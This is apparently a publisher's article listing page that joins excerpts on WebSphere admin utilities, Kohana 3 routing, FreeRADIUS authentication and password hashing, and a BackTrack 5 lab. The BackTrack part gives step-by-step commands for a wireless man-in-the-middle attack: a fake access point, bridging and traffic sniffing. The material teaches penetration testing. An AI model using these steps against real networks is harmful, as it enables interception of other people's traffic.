For Windows: ./dumpNameSpace.bat -root cell -report short -username wasadmin -password wasadmin > c:tempjnditree.txt The following screenshot shows a few segments of the contents of an example jnditree.txt file which would contain the output of the previous command. EAR expander Sometimes during application debugging or automated application deployment, you may need to enquire about the contents of an Enterprise Archive (EAR) file. An EAR file is made up of one or more WAR files (web applications), one or more Enterprise JavaBeans (EJBs), and there can be shared JAR files as well. Also, within each WAR file, there may be JAR files as well. The EARExpander.sh utility allows all artifacts to be fully decompressed much as expanding a TAR file. Usage syntax: EARExpander -ear (name of the input EAR file for the expand operation or name of the output EAR file for the collapse operation) -operationDir (directory to which the EAR file is expanded or directory from which the EAR file is collapsed) -operation (expand | collapse) [-expansionFlags (all | war)] [-verbose] To demonstrate the utility, we will expand the HRListerEAR.ear file. Ensure that you have uploaded the HRListerEAR.ear file to a new folder called /tmp/EARExpander on your Linux server or an appropriate alternative location and run the following command: For Linux: <was_root>/bin/EARExpander.sh -ear /tmp/HRListerEAR.ear -operationDir /tmp/expanded -operation expand -expansionFlags all -verbose For Windows: <was_root>binEARExpander.bat -ear c:tempHRListerEAR.ear -operationDir c:tempexpanded -operation expand -expansionFlags all -verbose The result will be an expanded on-disk structure of the contents of the entire EAR file, as shown in the following screenshot: An example of everyday use could be that EARExpander.sh is used as part of a deployment script where an EAR file is expanded and hardcoded properties files are searched and replaced. The EAR is then re-packaged using the EARExpander -operation collapse option to recreate the EAR file once the find-and-replace routine has completed. An example of how to collapse an expanded EAR file is as follows: For Linux: <was_root>/bin/EARExpander.sh -ear /tmp/collapsed/HRListerEAR.ear -operationDir /tmp/expanded -operation collapse -expansionFlags all -verbose For Windows: <was_root>binEARExpander.bat -ear c:tempcollapsedHRListerEAR. ear -operationDir c:tempexpanded -operation collapse -expansionFlags all -verbose In the previous command line examples, the folder called EARExpander contains an expanded HRListerEAR.ear file, which was created when we used the -expand command example previously. To collapse the files back into an EAR file, use the -collapse option, as shown previously in the command line example. Collapsing the EAR folders results in a file called HRListerEAR.ear, which is created by collapsing the expanded folder contents back into a single EAR file. IBM Support Assistant IBM Support Assistant can help you locate technical documents and fixes, and discover the latest and most useful support resources available. IBM Support Assistant can be customized for over 350 products and over 20 tools, not just WebSphere Application Server. The following is a list of the current features in IBM Support Assistant: Search Information Search and filter results from a number of different websites and IBM Information Centers with just one click. Product Information Provides you with a page full of related resources specific to the IBM software you are looking to support. It also lists the latest support news and information, such as the latest fixes, APARs, Technotes, and other support data for your IBM product. Find product education and training materials Using this feature, you can search for online educational materials on how to use your IBM product. Media Viewer The media viewer allows you search and find free education and training materials available on the IBM Education Assistant sites. You can also watch Flash-based videos, read documentation, view slide presentations, or download for offline access. Automate data collection and analysis Support Assistant can help you gather the relevant diagnostic information automatically so you do not have to manually locate the resources that can explain the cause of the issue. With its automated data collection capabilities, ISA allows you to specify the troublesome symptom and have the relevant information automatically gathered in an archive. You can then look through this data, analyze it with the IBM Support Assistant tool, and even forward data to IBM support. Generate IBM Support Assistant Lite packages for any product addon that has data collection scripts. You can then export a lightweight Java application that can easily be transferred to remote systems for remote data connection. Analysis and troubleshooting tools for IBM products ISA contains tools that enable you to troubleshoot system problems. These include: analyzing JVM core dumps and garbage collector data, analyzing system ports, and also getting remote assistance from IBM support. Guided Troubleshooter This feature provides a step-by-step troubleshooting wizard that can be used to help you look for logs, suggest tools, or recommend steps on fixing the problems you are experiencing. Remote Agent technology Remote agent capabilities through the feature pack provide the ability to perform data collection and file transfer through the workbench from remote systems. Note that the Remote agents must be installed and configured with appropriate 'root-level' access. ISA is a very detailed tool and we cannot cover every feature in this article. However, for a demonstration, we will install ISA and then update ISA with an add-on called the Log Analyzer. We will use the Log Analyzer to analyze a WAS SystemOut.log file. Downloading the ISA workbench To download ISA you will require your IBM user ID. The download can be found at the following URL: http://www-01.ibm.com/software/support/isa/download.html It is possible to download both Windows and Linux versions.
Read more
  • 0
  • 0
  • 4235

article-image-backtrack-5-advanced-wlan-attacks
Packt
13 Sep 2011
4 min read
Save for later

BackTrack 5: Advanced WLAN Attacks

Packt
13 Sep 2011
4 min read
  (For more resources on BackTrack, see here.) Man-in-the-Middle attack MITM attacks are probably one of most potent attacks on a WLAN system. There are different configurations that can be used to conduct the attack. We will use the most common one—the attacker is connected to the Internet using a wired LAN and is creating a fake access point on his client card. This access point broadcasts an SSID similar to a local hotspot in the vicinity. A user may accidently get connected to this fake access point and may continue to believe that he is connected to the legitimate access point. The attacker can now transparently forward all the user's traffic over the Internet using the bridge he has created between the wired and wireless interfaces. In the following lab exercise, we will simulate this attack. Time for action – Man-in-the-Middle attack Follow these instructions to get started: To create the Man-in-the-Middle attack setup, we will first c create a soft access point called mitm on the hacker laptop using airbase-ng. We run the command airbase-ng --essid mitm –c 11 mon0: It is important to note that airbase-ng when run, creates an interface at0 (tap interface). Think of this as the wired-side interface of our software-based access point mitm. Let us now create a bridge on the hacker laptop, consisting of the wired (eth0) and wireless interface (at0). The succession of commands used for this are—brctl addbr mitm-bridge, brctl addif mitm-bridge eth0, brctl addif mitmbridge at0, ifconfig eth0 0.0.0.0 up, ifconfig at0 0.0.0.0 up: We can assign an IP address to this bridge and check the connectivity with the gateway. Please note that we could do the same using DHCP as well. We can assign an IP address to the bridge interface with the command—ifconfig mitm-bridge 192.168.0.199 up. We can then try pinging the gateway 192.168.0.1 to ensure we are connected to the rest of the network: Let us now turn on IP Forwarding in the kernel so that routing and packet forwarding can happen correctly using echo > 1 /proc/sys/net/ipv4/ip_forward: Now let us connect a wireless client to our access point mitm. It would automatically get an IP address over DHCP (server running on the wired-side gateway). The client machine in this case receives the IP address 192.168.0.197. We can ping the wired side gateway 192.168.0.1 to verify connectivity: We see that the host responds to the ping requests as seen: We can also verify that the client is connected by looking at the airbase-ng terminal on the hacker machine: It is interesting to note here that because all the traffic is being relayed from the wireless interface to the wired-side, we have full control over the traffic. We can verify this by starting Wireshark and start sniffing on the at0 interface: (Move the mouse over the image to enlarge it.) Let us now ping the gateway 192.168.0.1 from the client machine. We can now see the packets in Wireshark (apply a display filter for ICMP), even though the packets are not destined for us. This is the power of Man-in-the-Middle attacks! (Move the mouse over the image to enlarge it.) What just happened? We have successfully created the setup for a wireless Man-In-The-Middle attack. We did this by creating a fake access point and bridging it with our Ethernet interface. This ensured that any wireless client connecting to the fake access point would "perceive" that it is connected to the Internet via the wired LAN. Have a go hero – Man-in-the-Middle over pure wireless In the previous exercise, we bridged the wireless interface with a wired one. As we noted earlier, this is one of the possible connection architectures for an MITM. There are other combinations possible as well. An interesting one would be to have two wireless interfaces, one creates the fake access point and the other interface is connected to the authorized access point. Both these interfaces are bridged. So, when a wireless client connects to our fake access point, it gets connected to the authorized access point through the attacker machine. Please note that this configuration would require the use of two wireless cards on the attacker laptop. Check if you can conduct this attack using the in-built card on your laptop along with the external one. This should be a good challenge!
Read more
  • 0
  • 0
  • 3667
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-routing-kohana-3
Packt
12 Sep 2011
8 min read
Save for later

Routing in Kohana 3

Packt
12 Sep 2011
8 min read
  (For more resources on this topic, see here.) The reader can benefit from the previous article on Request Flow in Kohana 3. Routing in Kohana If you remember, the bootstrap file comes preconfigured with a default route that follows a very simple structure: Route::set(‘default’, ‘(<controller>(/<action>(/<id>)))’) ->defaults(array( ‘controller’ => ‘welcome’, ‘action’ => ‘index’, )); This tells Kohana that when it parses the URL for any request, it first finds the base_url, and then the next segment will contain the controller, then the action, then an ID. These are all optional setgments, with the default controller and action being set in the array. We have taken advantage of this route with other controllers like our Profile and Message controller. When we visit http://localhost/egotist/profile, the route sets the controller to profile, and since no action or ID is explicitly defined in the URL, the default action of ‘index’ is used. When we requested http://localhost/egotist/messages/get_messages from within our Profile Controller, we also followed this route; however, neither defaults were needed, and the route asked for the Messages Controller and its get_messages action. In our Profile controller, we are only using one array of example messages to test functionality and the expected behavior of our application. When we implement a data store and have multiple users with profiles in our application, we will need a way to decipher which profile a user wants to see. Because the default route already has an available parameter for ID, we can use that to pass an ID to our Profile Controller’s index action, and have the messages controller then find the proper messages for that user.   Time for action – Making profiles dynamic using ID Once a database is tied to our application, and more than one user has a profile, we will need some way of knowing which profile to display. A simple and effective way to do this is to pass a user ID in the route, and have our controller use that ID to find the right messages for the right user. Let’s add some more test data to our messages system, and use an ID to display the right messages. Open the Profile Controller in our application/classes/controller/ directory named profile.php. Since the action_index() method is the controller action that is called when a profile is viewed, we will need to edit it to look for the ID parameter in the URI like this: public function action_index(){ $content = View::factory(<profile/public>) ->set(<username>, <Test User>) ->bind(<messages>, $messages); $id = (int) $this->request->param(‘id’); $messages_uri = "messages/get_messages/$id"; $messages = Request::factory($messages_uri)->execute()->response; $this->template->content = $content;} Now, we are retrieving the ID from the route and passing it along in our request to the Messages Controller. This means that class must also be updated. Open the messages.php file located in application/classes/controllers/ and modify its action_get_messages() method as follows: public function action_get_messages(){ $id = (int) $this->request->param(‘id’); $messages = array( 1 => array( ‘This is test message one for user 1’, ‘This is test message two for user 1’, ‘This is test message three for user 1’ ), 2 => array( ‘This is test message one for user 2’, ‘This is test message two for user 2’, ‘This is test message three for user 2’ ) ); $messages = array_key_exists($id, $messages) ? $messages[$id] :NULL; $this->request->response = View::factory(‘profile/messages’) ->set(‘messages’, $messages);} Open the page http://localhost/egotist/profile/index/2/. It should look like this: Browsing to http://localhost/egotist/profile/index/1/ will show the messages for user 1, i.e., the test messages placed in the message array under key 1. What just happened? At the very beginning of our index action in our Profile Controller, we set our $id variable by getting the ID parameter from the route. Since Kohana has parsed our route for us, we can now access these parameters via the request object’s param() method. Once we got the ID variable, we then created and executed the request for the message controller’s get_messages action, and passed the ID to that method for it to use. In the Message Controller, we used the same method to extract the ID from the request, and then used that ID to determine which messages from the messages array to display. Although this works fine for illustrating routing for these two users, the code is far from ready, even without a data store or real user data, but it does show how the parameters can be read and used. Because most of the functionality in the controller will be replaced with our database and more precise data being passed around, we can overlook the incompleteness of the current controller actions, and begin looking at creating a URL that is better looking than http://localhost/egotist/profile/index/2/ for finding a user profile by ID. Creating friendly URLs using custom routes Consider how nice it would be if our users could browse to a profile without putting ‘index’ in the action portion of the URI, like this: http://localhost/egotist/profile/2. This looks much more pleasing, and is more in line with what we would like our URLs to look like in web apps. It is in fact very easy to have Kohana use a route to remove the index action from the URI. Routes not only make our URLs more pleasing and descriptive, but they make our application easier to maintain in the long run. We have more control over where our users are being directed from how the URL is constructed, without having to create controller actions designed to handle routing.   Time for action – Creating a Custom Route So far, we have been using the default route that is in our application bootstrap. As our application grows, so will the number of available ‘starting points’ for our user’s requests. Not every controller, action, or parameter has to comply with the default route, and this gives us a lot of flexibility and freedom. We can add a custom route to handle user’s profiles by adding it to our bootstrap.php file. Open the bootstrap.php file located in application/directory and modify the routes block so it looks like this: /** * Set the routes.Each route must have a minimum of a name,a URI * and a set of defaults for the URI. */Route::set(‘profile’, ‘profile/<id>’) ->defaults(array( ‘controller’ => ‘profile’, ‘action’ => ‘index’, ));Route::set(‘default’, ‘(<controller>(/<action>(/<id>)))’) ->defaults(array( ‘controller’ => ‘welcome’, ‘action’ => ‘index’, )); Now, we can view the profile pages without having to pass the index action in the URL. Open http://localhost/egotist/profile/2 in a browser; it should look like this: Browsing to profiles with a more friendly URL is made possible through Kohana’s routes. What just happened? By setting routes using the Route::set static method, we are essentially creating filters that will be used to match requests with routes. We can name these routes; in this case we have one named default, and one named profile. Kohana uses the second parameter in the set() method to compare against the requested URI, and will call the first route that matches the request. Because it uses the first route that matches the request, it is very important when ordering route definitions. If we put the default route before the profile route, the profile route will never be used, as the default route would always match first. Because it looks for a match, it does not use discretion when determining the right route for a request. So if we browse to http://localhost/egotist/profile/index/2, we will be directed to the default route, and get the same result. The default route may not be available for all the routes we create in the future, so create routes that are as explicit as we can for our needs. Right now, our application assumes any data that is passed after a controller segment named ‘profile’ must be the ID for which we are looking. In our current application setup, we only need digits. If a user passes data into the URL that is not numeric for the ID parameter, we do not want it to go to that route. This can be accomplished easily inside the Route::set() method.  
Read more
  • 0
  • 0
  • 2730

article-image-request-flow-kohana-3
Packt
12 Sep 2011
12 min read
Save for later

Request Flow in Kohana 3

Packt
12 Sep 2011
12 min read
  (For more resources on this topic, see here.) The reader can benefit from the previous article on Routing in Kohana 3.   Hierarchy is King in Kohana Kohana is layered in more ways than one. First, it has a cascading files system. This means the framework loads files for each of it’s core parts in a hierarchical order, which is explained in more detail in just a bit. Next, Kohana allows for controllers to initiate requests, making the application workflow follow a hierarchical design pattern. These features are the foundation of HMVC, which essentially is a cascading filesystem, flexible routing and request handling, the ability to execute sub-requests combined with a standard MVC pattern. The framework manages locating and loading the right file by using a core method named Kohana::find_file(). This method searches the filesystem in a predetermined order to load the proper class first. The order the method searches in is (with default paths): Application path (/application) Modules (/modules) as ordered in bootstrap.php System path (/system) Cascading filesystem As the framework loads, it creates a merged filesystem based on the order of loading described above. One of the benefits of loading files this way is the ease to overload classes that would be loaded later in the flow. We never have to, nor should we, alter a file in the system directory. We can override the default behavior of any method by overloading it in the application directory. Another great advantage is the consistency this mechanism offers. We know the exact load order for every class in any application, making it much easier to create custom code and know exactly where it needs to live. This image shows an example application being merged into the final file structure that will be used when completing a request. We can see how some classes in the application layer are overriding files in the modules. This makes it easier to visualize how modules extend and enhance the framework by building on the system core. Our application then sits on top of the system and module files, and then can build and extend the functionality of the module and system layers. Kohana also makes it easy to load third-party libraries, referred to as vendor libraries, into the filesystem. Each of the three layers has five basic folders into which Kohana looks: Classes (/classes) contain all autoloaded class files. This directory includes our Controller, Models, and their supporting classes. Autoloading allows us to use classes without having to include them manually. Any classes inside this directory will automatically be searched and loaded when they are used. Config files (/config) are files containing arrays that can be parsed and loaded using the core method Kohana::config(). Some config files are required to configure and properly load modules, while others may be created by us to make our application easier to maintain, or to keep vendor libraries tidy by moving config data to the framework. Config files are the only files in the cascading filesystem that are not overloaded; all config files are merged with their parent files. Internationalization files (/i18n) make it much easier to create language files that work with our applications to deliver the proper content that best suits the language of our users. Messages (/messages) are much like configuration files, in that they are arrays that are loaded by a core Kohana method. Kohana:: message() parses and returns the messages for a specific array. This functionality is very useful when creating forms and actions for our applications. View files (/views) are the presentation layer of our applications, where view files and template files live.   Request flow in Kohana Now that we have seen how the framework merges files to create a set of files to load on request, it is a good place to see the flow of the files in Kohana. Remember that controllers can invoke requests, making a bit of a loop between controllers, models, and views, but the frameworks always runs in the same order, beginning with the index.php file. The index.php file sets the path to the application, modules, and system directories and saves them to as constants that are then defined for global use. These constants are APPPATH, MODPATH, and SYSPATH, and they hold the paths for the application, modules, and system paths respectively. After the error-reporting levels are set, Kohana looks to see if the install.php file exists. If the install file is not found, Kohana takes the next step in loading the framework by loading the core Kohana class. Next, the index file looks for the application’s Kohana class, first in the application directory, then in the system path. This is the first example of Kohana looking for our files before it looks for its own. The last thing the index file does is bootstrap our application, by requiring the bootstrap.php file and loading it. You probably remember having to configure the bootstrap file when we installed Kohana. This is the file in which we set our base URL and modules; however, it is a bit more important than just basic installation and configuration. The boostrap begins by setting a some basic environment settings, like the default timezone and locale. Next, it enables the autoloader, and defines the application environment. This tells the framework whether our application is in a production or development environment, allowing it to make decisions based on its environment-specific settings. Next, the default options are set and Kohana is initialized, with the Kohana::init() method being called. After Kohana’s initialization, it sets up logging, configuration reading, and then modules. Modules are loaded defined using an array, with the module name as the key, and the path to the module as the value. The modules load order is listed in this array, and are all subject to the same rules and conventions as core and application code. Each module is added to the cascading file system as described above, allowing files to override any that may be added later when the system files are merged. Modules can contain their own init files, named init.php, that act similar to the application bootstrap, adding routes specific to the modules for our application to use. The last thing the bootstrap does in a normal request flow is to set the routes for the application. Kohana ships with a default route that loads the index action in the welcome controller. The Route object’s set method accepts an array that defines the name, URI, and defaults for the parameters set for the URI. By setting default controllers, actions, and params, we can have dynamic URLs that have default values if none are passed. If no controller or action is passed in the URI on a vanilla Kohana install, the welcome controller will be loaded, and the index action invoked as outlined in the array passed to the Route::set() method in the boostrap. Once all the application routes are set via the Route::set() method and init.php files residing in modules, Request::instance() is invoked, setting the request loop into action. As the Request object processes the request, it looks through routes until it finds the right controller to load. The request object then instantiates the controller, passing the request to the controller for it to use. The Controller::before() method is then called, which acts much like a constructor. By being called first, the before() method allows any logic that need to be performed before a controller action is run to execute. Once the before method is complete, the object continues to load the requested functions, just like when a constructor is complete. The controller action, a method in the controller class, is then called, and once complete, it returns the request response. The action method is where the business logic for the request will reside. Once the action is complete, the Controller::after() method is called, much like the destructor of a standard PHP class. Because of the hierarchical structure of Kohana, any controller can initiate a new request, making it possible for other controllers to be loaded, invoking more controller actions, which generate request responses. Once all the requests have been fulfilled, Kohana renders the final request response. The Kohana request flow can seem like it is long and complex, but it can also be looked at as very clean and organized. By using a front controller design pattern, all requests are handled by just one file: index.php. Each and every request that is handled by our applications will begin with this one file. From there the application is bootstrapped, and then the controller designed to handle the specific request is found, executed, and displayed. Although, as we have seen, there is more that is happening, for most of our applications, this simple way of looking at the request flow will make it easy to create powerful web applications using Kohana.   Using the Request object The request flow in Kohana is interesting, and it is easy to see how it can be powerful on a high level, but the best way to understand HMVC and routing in Kohana is to look at some actual code, and see what the resulting outcome is for real world scenarios. Kohana’s Request object determines the proper controller to invoke, and acts as a wrapper for the response. If we look at the Template Controller that we are extending in our Application Controller for the case study site, we can follow the inheritance path back to Kohana’s template controller, and see the request response. One of the best ways to understand what is happening inside the framework is to drill down through the filesystem and look at the actual code. One of the great advantages of open sources frameworks is the ability to read the code that makes the library run. Opening the welcome controller located at application/classes/controller/welcome.php, we see the following class declaration: class Controller_Welcome extends Controller_Application The first thing we see in the base controller class is that it extends another Controller, and then we see the declaration of an object property named $request. This variable holds the Kohana_Request object, the class that created the original controller call. In the constructor, we can see that the Kohana_Request object is being type-hinted for the argument, and it is setting the $request object property on instantiation. All that is left in the base Controller class is the before() and after() methods with no functionality. We can then open our Application Controller, located at application/classes/controller/application.php. The class declaration in this controller looks like this: abstract class Controller_Application extends Controller_Template In this file, we can see the before() method loading the template view into the template variable, and in the after() method, we see the Request obeject ($this->request) having the response body set, ready to be rendered. This class, in turn, extends the Template Controller. The Template Controller is part of the Kohana system. Since we have not created any controllers in our application or modules the original template controller that ships with Kohana is being loaded. It is located at system/classes/controller/template.php. The class declaration in this controller looks like: abstract class Controller_Template extends Kohana_Controller_Template Here things take a twist, and for the first time, we are going to have to leave the /classes/controller/ structure to find an inherited class. The Kohana_Controller_Template class lives in system/classes/kohana/controller/template.php. The class is fairly short and simple, and it has this class declaration: abstract class Kohana_Controller_Template extends Controller This controller (system/classes/controller.php) is the base controller that all requested controller classes must extend. Examining this class will let us see the Request class enter the Controller loop and the template view get sent to the Request object as the response. Walking through the Welcome Controller’s heritage is a great way of seeing how the Request object loads a controller, and how the parent classes all contribute to the request flow in Kohana. It may seem like pointless complexity at first, however, the benefits of transparent extension are very powerful, and Kohana makes the mechanisms work all behind the scenes. But one question still remains: How is the request object aware of the controllers and routes? Athough dissecting Kohana’s Request Class could be a article unto itself, a lot can be answered by looking at the contstructor in the system/classes/kohana/request.php file. The constructor is given the URI, and then stores object properties that the object will later use to execute the request. The Request class does have a couple of key methods that can be very helpful. The first is Request::controller(), which returns the name of the controller for the request, and the other is Request::action(), which similarly returns the name of the action for the request. After loading the routes, the method then iterates through the routes, determines any matches for the URI, and begins setting the controller, action, and parameters for the route. If there are not matches for optional segments of the route, the defaults are stored in the object properties. When the Request object’s execute() method is called, the request is processed, and the response is returned. This happens by first processing the before() method, then the controller action being requested, then the after() method for the class, followed by any other requests until all have completed. The topic of initiating a request from within a controller has arisen a few times, and is the best way to illustrate the Hierarchical aspect of HMVC. Let’s take a look at this process by creating a controller method that initiates a new request, and see how it completes.  
Read more
  • 0
  • 0
  • 2532

article-image-storing-passwords-using-freeradius-authentication
Packt
08 Sep 2011
6 min read
Save for later

Storing Passwords Using FreeRADIUS Authentication

Packt
08 Sep 2011
6 min read
In the previous article we covered the Authentication Methods used while working with FreeRADIUS. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches methods for storing passwords and how they work. Passwords do not need to be stored in clear text and it is better to store them in a hashed format. There are, however, limitations to the kind of authentication protocols that can be used when the passwords are stored as a hash which we will explore in this article. (For more resources on this subject, see here.) Storing passwords Username and password combinations have to be stored somewhere. The following list mentions some of the popular places: Text files: You should be familiar with this method by now. SQL databases: FreeRADIUS includes modules to interact with SQL databases. MySQL is very popular and widely used with FreeRADIUS. Directories: Microsoft's Active Directory or Novell's e-Directory are typical enterprise-size directories. OpenLDAP is a popular open source alternative. The users file and the SQL database that can be used by FreeRADIUS store the username and password as AVPs. When the value of this AVP is in clear text, it can be dangerous if the wrong person gets hold of it. Let's see how this risk can be minimized. Hash formats To reduce this risk, we can store the passwords in a hashed format. A hashed format of a password is like a digital fingerprint of that password's text value. There are many different ways to calculate this hash, for example MD5 or SHA1. The end result of a hash should be a one-way fixed-length encrypted string that uniquely represents the password. It should be impossible to retrieve the original password out of the hash. To make the hash even more secure and more immune to dictionary attacks we can add a salt to the function that generates the hash. A salt is randomly generated bits to be used in combination with the password as input to the one way hash function. With FreeRADIUS we store the salt along with the hash. It is therefore essential to have a random salt with each hash to make a rainbow table attack difficult. The pap module, which is used for PAP authentication, can use passwords stored in the following hash formats to authenticate users: Both MD5 and SSH1 hash functions can be used with a salt to make it more secure. Time for action – hashing our password We will replace the Cleartext-Password AVP in the users file with a more secure hashed password AVP in this section. There seems to be a general confusion on how the hashed password should be created and presented. We will help you clarify this issue in order to produce working hashes for each format. A valuable URL to assist us with the hashes is the OpenLDAP FAQ: http://www.openldap.org/faq/data/cache/419.html There are a few sections that show how to create different types of password hashes. We can adapt this for our own use in FreeRADIUS. Crypt-Password Crypt password hashes have their origins in Unix computing. Stronger hashing methods are preferred over crypt, although crypt is still widely used. The following Perl one-liner will produce a crypt password for passme with the salt value of 'salt': #> perl -e 'print(crypt("passme","salt")."n");' Use this output and change Alice's check entry in the users file from: "alice" Cleartext-Password := "passme" to: "alice" Crypt-Password := "sa85/iGj2UWlA" Restart the FreeRADIUS server in debug mode. Run the authentication request against it again. Ensure that pap now uses the crypt password by looking for the following line in the FreeRADIUS debug feedback: [pap] Using CRYPT password "sa85/iGj2UWlA" MD5-Password The MD5 hash is often used to check the integrity of a file. When downloading a Linux ISO image you are also typically supplied with the MD5 sum of the file. You can then confirm the integrity of the file by using the md5sum command. We can also generate an MD5 hash from a password. We will use Perl to generate and encode the MD5 hash in the correct format that is required by the pap module. The creation of this password hash involves external Perl modules, which you may have to install first before the script can be used. The following steps will show you how: Create a Perl script with the following contents; we'll name it 4088_04_md5.pl: #! /usr/bin/perl -wuse strict;use Digest::MD5;use MIME::Base64;unless($ARGV[0]){ print "Please supply a password to create a MD5 hash from.n"; exit;}my $ctx = Digest::MD5->new;$ctx->add($ARGV[0]);print encode_base64($ctx->digest,'')."n"; Make the 4088_04_md5.pl file executable: chmod 755 4088_04_md5.pl Get the MD5 password for passme: ./4088_04_md5.pl passme Use this output and update Alice's entry in the user's file to: "alice" MD5-Password := "ugGBYPwm4MwukpuOBx8FLQ==" Restart the FreeRADIUS server in debug mode. Run the authentication request against it again. Ensure that pap now uses the MD5 password by looking for the following line in the FreeRADIUS debug feedback: [pap] Using MD5 encryption. SMD5-Password This is an MD5 password with salt. The creation of this password hash involves external Perl modules, which you may have to install first before the script can be used. Create a Perl script with the following contents; we'll name it 4088_04_smd5.pl: #! /usr/bin/perl -wuse strict;use Digest::MD5;use MIME::Base64;unless(($ARGV[0])&&($ARGV[1])){ print "Please supply a password and salt to create a salted MD5 hash from.n"; exit;}my $ctx = Digest::MD5->new;$ctx->add($ARGV[0]);my $salt = $ARGV[1];$ctx->add($salt);print encode_base64($ctx->digest . $salt ,'')."n"; Make the 4088_04_smd5.pl file executable: chmod 755 4088_04_smd5.pl Get the SMD5 value for passme using a salt value of 'salt': ./4088_04_smd5.pl passme salt Remember that you should use a random value for the salt. We only used salt here for the demonstration. Use this output and update Alice's entry in the user's file to: "alice" SMD5-Password := "Vr6uPTrGykq4yKig67v5kHNhbHQ=" Restart the FreeRADIUS server in debug mode. Run the authentication request against it again. Ensure that pap now uses the SMD5 password by looking for the following line in the FreeRADIUS debug feedback. [pap] Using SMD5 encryption.
Read more
  • 0
  • 0
  • 22373

article-image-freeradius-working-authentication-methods
Packt
08 Sep 2011
6 min read
Save for later

FreeRADIUS: Working with Authentication Methods

Packt
08 Sep 2011
6 min read
Authentication is a process where we establish if someone is who he or she claims to be. The most common way is by a unique username and password. This article by Dirk van der Walt, author of FreeRADIUS Beginner's Guide, teaches authentication methods and how they work. Extensible Authentication Protocol (EAP) is covered later in a dedicated article. In this article we shall: Discuss PAP, CHAP, and MS-CHAP authentication protocols See when and how authentication is done in FreeRADIUS Explore ways to store passwords Look at other authentication methods (For more resources on this subject, see here.) Authentication protocols This section will give you background on three common authentication protocols. These protocols involve the supply of a username and password. The radtest program uses the Password Authentication Protocol (PAP) by default when testing authentication. PAP is not the only authentication protocol but probably the most generic and widely used. Authentication protocols you should know about are PAP, CHAP, and MS-CHAP. Each of these protocols involves a username and password. The next article on Extensible Authentication Protocol (EAP) protocol will introduce us to more authentication protocols. An authentication protocol is typically used on the data link layer that connects the client with the NAS. The network layer will only be established after the authentication is successful. The NAS acts as a broker to forward the requests from the user to the RADIUS server. The data link layer and network layer are layers inside the Open Systems Interconnect model (OSI model). The discussion of this model is almost guaranteed to be found in any book on networking:http://en.wikipedia.org/wiki/OSI_model PAP PAP was one of the first protocols used to facilitate the supply of a username and password when making point-to-point connections. With PAP the NAS takes the PAP ID and password and sends them in an Access-Request packet as the User-Name and User-Password. PAP is simpler compared to CHAP and MS-CHAP because the NAS simply hands the RADIUS server a username and password, which are then checked. This username and password come directly from the user through the NAS to the server in a single action. Although PAP transmits passwords in clear text, using it should not always be frowned upon. This password is only in clear text between the user and the NAS. The user's password will be encrypted when the NAS forwards the request to the RADIUS server. If PAP is used inside a secure tunnel it is as secure as the tunnel. This is similar to when your credit card details are tunnelled inside an HTTPS connection and delivered to a secure web server. HTTPS stands for Hypertext Transfer Protocol Secure and is a web standard that uses Secure Socket Layer/Transport Layer Security (SSL/TLS) to create a secure channel over an insecure network. Once this secure channel is established, we can transfer sensitive data, like credit card details, through it. HTTPS is used daily to secure many millions of transactions over the Internet. See the following schematic of a typical captive portal configuration. The following table shows the RADIUS AVPs involved in a PAP request: As you can see the value of User-Password is encrypted between the NAS and the RADIUS server. Transporting the user's password from the user to the NAS may be a security risk if it can be captured by a third party. CHAP CHAP stands for Challenge-Handshake Authentication Protocol and was designed as an improvement to PAP. It prevents you from transmitting a cleartext password. CHAP was created in the days when dial-up modems were popular and the concern about PAP's cleartext passwords was high. After a link is established to the NAS, the NAS generates a random challenge and sends it to the user. The user then responds to this challenge by returning a one-way hash calculated on an identifier (sent along with the challenge), the challenge, and the user's password. The user's response is then used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS will return CHAP Success or CHAP Failure to the user. The NAS can also request at random intervals that the authentication process be repeated by sending a new challenge to the user. This is another reason why it is considered more secure than PAP. One major drawback of CHAP is that although the password is transmitted encrypted, the password source has to be in clear text for FreeRADIUS to perform password verification. The FreeRADIUS FAQ discuss the dangers of transmitting a cleartext password compared to storing all the passwords in clear text on the server. The following table shows the RADIUS AVPs involved in a CHAP request: MS-CHAP MS-CHAP is a challenge-handshake authentication protocol created by Microsoft. There are two versions, MS-CHAP version 1 and MS-CHAP version 2. The challenge sent by the NAS is identical in format to the standard CHAP challenge packet. This includes an identifier and arbitrary challenge. The response from the user is also identical in format to the standard CHAP response packet. The only difference is the format of the Value field. The Value field is sub-formatted to contain MS-CHAP-specific fields. One of the fields (NT-Response) contains the username and password in a very specific encrypted format. The reply from the user will be used by the NAS to create an Access-Request packet, which is sent to the RADIUS server. Depending on the reply from the RADIUS server, the NAS will return Success Packet or Failure Packet to the user. The RADIUS server is not involved with the sending out of the challenge. If you sniff the RADIUS traffic between an NAS and a RADIUS server you can confirm that there is only an Access-Request followed by an Access-Accept or Access-Reject. The sending out of a challenge to the user and receiving a response from her or him is between the NAS and the user. MS-CHAP also has some enhancements that are not part of CHAP, like the user's ability to change his or her password or inclusion of more descriptive error messages. The protocol is tightly integrated with the LAN Manager and NT Password hashes. FreeRADIUS will convert a user's cleartext password to an LM-Password and an NT-Password in order to determine if the password hash that came out of the MS-CHAP request is correct. Although there are known weaknesses with MS-CHAP, it remains widely used and very popular. Never say never. If your current requirement for the RADIUS deployment does not include the use of MS-CHAP, rather cater for the possibility that one day you may use it. The most popular EAP protocol makes use of MS-CHAP. EAP is crucial in Wi-Fi authentication. Because MS-CHAP is vendor specific, VSAs instead of AVPs are part of the Access-Request between the NAS and RADIUS server. This is used together with the User-Name AVP. Now that we know more about the authentication protocols, let's see how FreeRADIUS handles them.
Read more
  • 0
  • 0
  • 9947
article-image-getting-started-freeradius
Packt
07 Sep 2011
6 min read
Save for later

Getting Started with FreeRADIUS

Packt
07 Sep 2011
6 min read
